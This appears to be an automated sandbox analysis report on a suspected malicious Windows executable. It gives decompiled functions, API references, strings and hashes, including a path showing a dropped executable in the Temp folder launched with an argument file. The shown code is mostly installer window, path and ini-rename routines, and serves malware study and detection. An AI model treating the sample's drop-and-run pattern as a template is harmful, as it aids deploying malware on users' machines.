Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a230;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429220, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a228;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040614D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040614D(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426da8 = 0x55004e;
				 *0x426dac = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4275a8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269a8, "%ls=%ls\r\n", 0x426da8, 0x4275a8);
						_t53 = _t52 + 0x10;
						E00406544(_t37, 0x400, 0x4275a8, 0x4275a8,  *((intOrPtr*)( *0x42a230 + 0x128)));
						_t12 = E00405FF7(0x4275a8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E0040607A(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F5C(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F5C(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FB2(_t24 + _t46, 0x4269a8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060A9(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405FF7(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426da8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x0040614d
0x00406156
0x0040615d
0x00406167
0x0040617b
0x004061a3
0x004061ae
0x004061b2
0x004061d2
0x004061d9
0x004061e3
0x004061f0
0x004061f5
0x004061fa
0x004061fe
0x0040620d
0x0040620f
0x0040621c
0x00406220
0x004062bb
0x00000000
0x00406236
0x00406243
0x00406267
0x0040626b
0x0040628a
0x0040628e
0x0040628e
0x00406290
0x00406299
0x004062a4
0x004062af
0x004062b5
0x00000000
0x004062b5
0x0040626d
0x00406270
0x0040627b
0x00406277
0x00406279
0x0040627a
0x0040627a
0x00406282
0x00406284
0x00000000
0x00406284
0x0040624e
0x00406254
0x00000000
0x00406254
0x00406220
0x004061fe
0x0040617d
0x00406188
0x00406191
0x00406195
0x00000000
0x00000000
0x00406195
0x004062c6

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
GetShortPathNameW.KERNEL32 ref: 00406191

Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E

GetShortPathNameW.KERNEL32 ref: 004061AE
wsprintfA.USER32 ref: 004061CC
GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
GlobalFree.KERNEL32 ref: 004062B5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC

Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\ypdTgfE0o8.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

Strings

[Rename], xrefs: 00406236, 00406248
%ls=%ls, xrefs: 004061C2

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 103a52d89d2190fa92995d585e71df630d47c1fe56f755659e2bb6cae3d098e7
Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
Opcode Fuzzy Hash: 103a52d89d2190fa92995d585e71df630d47c1fe56f755659e2bb6cae3d098e7
Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD

Uniqueness

Uniqueness Score: -1.00%

Function 00406544 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00406544(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x4291fc - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a258 + _t44 * 2;
				_t45 = 0x4281c0;
				_t108 = 0x4281c0;
				if(_a4 >= 0x4281c0 && _a4 - 0x4281c0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406507(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E00406544(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x4281c0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406507(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E0040644E(_t108,  *0x42a228);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E0040678E(_t108);
							}
							goto L38;
						}
						if( *0x42a2a4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a224;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a228,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a228,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E004063D5( *0x42a258, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a258 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E00406544(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x00406544
0x00406544
0x00406544
0x0040654a
0x0040654f
0x00406560
0x00406560
0x00406568
0x00406569
0x0040656a
0x0040656b
0x0040656e
0x00406576
0x00406578
0x00406589
0x0040658c
0x0040658c
0x00406590
0x00406596
0x00406599
0x00406774
0x00406774
0x0040677f
0x0040678b
0x0040678b
0x00000000
0x0040659f
0x004065a4
0x004065b9
0x004065ba
0x004065c0
0x00406752
0x00406760
0x00406763
0x00406763
0x00406754
0x00406757
0x0040675a
0x0040675c
0x0040675c
0x00406765
0x00406765
0x0040676b
0x0040676e
0x004065a1
0x00000000
0x004065a1
0x00000000
0x0040676e
0x004065c6
0x004065c9
0x004065d8
0x004065df
0x004065eb
0x004065ee
0x004065f1
0x004065f2
0x004065f7
0x004065fd
0x00406600
0x00406603
0x004066f6
0x004066fb
0x0040672e
0x00406733
0x00406738
0x0040673d
0x0040673d
0x00406742
0x00406748
0x0040674b
0x00000000
0x0040674b
0x004066fd
0x00406700
0x00406703
0x00406718
0x0040671f
0x00406705
0x0040670c
0x0040670c
0x00406727
0x0040672a
0x004066ee
0x004066ef
0x004066ef
0x00000000
0x0040672a
0x00406610
0x00406614
0x00406614
0x00406615
0x00406617
0x00406654
0x00406657
0x00406667
0x0040666a
0x00406672
0x00406678
0x00406678
0x004066d3
0x004066d3
0x004066d5
0x00000000
0x00000000
0x0040667c
0x00406681
0x00406682
0x00406684
0x0040669b
0x004066a9
0x004066af
0x004066b1
0x004066cf
0x004066cf
0x004066cf
0x00000000
0x004066cf
0x004066b7
0x004066c0
0x004066c3
0x004066c9
0x004066cd
0x00000000
0x00000000
0x00000000
0x004066cd
0x00406695
0x00406697
0x00406699
0x00000000
0x00000000
0x00000000
0x00406699
0x00000000
0x004066d3
0x0040665f
0x00000000
0x00406619
0x00406637
0x00406640
0x004066dd
0x004066e1
0x004066e9
0x004066e9
0x00000000
0x004066e1
0x0040664a
0x004066d7
0x004066db
0x00000000
0x00000000
0x00000000
0x004066db
0x00406617
0x00000000
0x004065a4

APIs

GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,00000400), ref: 0040665F
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,00000400,00000000,004226E8,?,004055A0,004226E8,00000000,00000000,00418EC0,00000000), ref: 00406672
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743

Strings

C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny, xrefs: 0040656E, 00406621, 00406628, 0040662C, 00406649, 0040665E, 00406671, 00406686, 004066B3, 004066E8, 004066EE, 0040670B, 0040671E, 0040673C, 00406742, 0040674B, 00406781
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004066E3
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040662D

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-2335325304
Opcode ID: c443ed2fe3bb0bf6a7f47d91466dd90616c2d01c1c672cece4f8c154340eecc2
Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
Opcode Fuzzy Hash: c443ed2fe3bb0bf6a7f47d91466dd90616c2d01c1c672cece4f8c154340eecc2
Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405569 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405569(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429204;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a2d4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406544(_t38, 0, 0x4226e8, 0x4226e8, _a4);
					}
					_t27 = lstrlenW(0x4226e8);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x4291e8, 0x4226e8);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4226e8;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x4226e8[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x4226e8, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x0040556f
0x00405579
0x0040557e
0x00405584
0x0040558f
0x00405592
0x00405595
0x0040559b
0x0040559b
0x004055a1
0x004055a9
0x004055ac
0x004055c9
0x004055cd
0x004055d6
0x004055d6
0x004055e0
0x004055e9
0x004055f5
0x004055fc
0x00405600
0x00405603
0x00405616
0x00405624
0x00405624
0x00405628
0x0040562a
0x0040562d
0x00000000
0x0040562d
0x004055ae
0x004055b6
0x004055be
0x004055c4
0x00000000
0x004055c4
0x004055be
0x004055ac
0x00405639

APIs

lstrlenW.KERNEL32(004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
lstrlenW.KERNEL32(004033ED,004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
lstrcatW.KERNEL32(004226E8,004033ED), ref: 004055C4
SetWindowTextW.USER32(004226E8,004226E8), ref: 004055D6
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Part of subcall function 00406544: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
Part of subcall function 00406544: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743

Strings

&B, xrefs: 0040558A

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: &B
API String ID: 1495540970-3208460036
Opcode ID: cd3d78f21fdbe6d171f1bc4f822c20816f526bae1c4251478e7d40ba4a5f3583
Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
Opcode Fuzzy Hash: cd3d78f21fdbe6d171f1bc4f822c20816f526bae1c4251478e7d40ba4a5f3583
Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004044CA Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044CA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x004044dc
0x00404592
0x00000000
0x00404592
0x004044ed
0x004044f1
0x00000000
0x0040450b
0x0040450b
0x00404514
0x00000000
0x00000000
0x00404516
0x00404522
0x00404525
0x00404525
0x0040452b
0x00404531
0x00404531
0x0040453d
0x00404543
0x0040454a
0x0040454d
0x00404550
0x00404552
0x00404552
0x0040455a
0x00404560
0x00404560
0x0040456a
0x0040456f
0x00404572
0x00404577
0x0040457a
0x0040457a
0x0040458a
0x0040458a
0x00000000
0x0040458d

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004044E7
GetSysColor.USER32(00000000), ref: 00404525
SetTextColor.GDI32(?,00000000), ref: 00404531
SetBkMode.GDI32(?,?), ref: 0040453D
GetSysColor.USER32(?), ref: 00404550
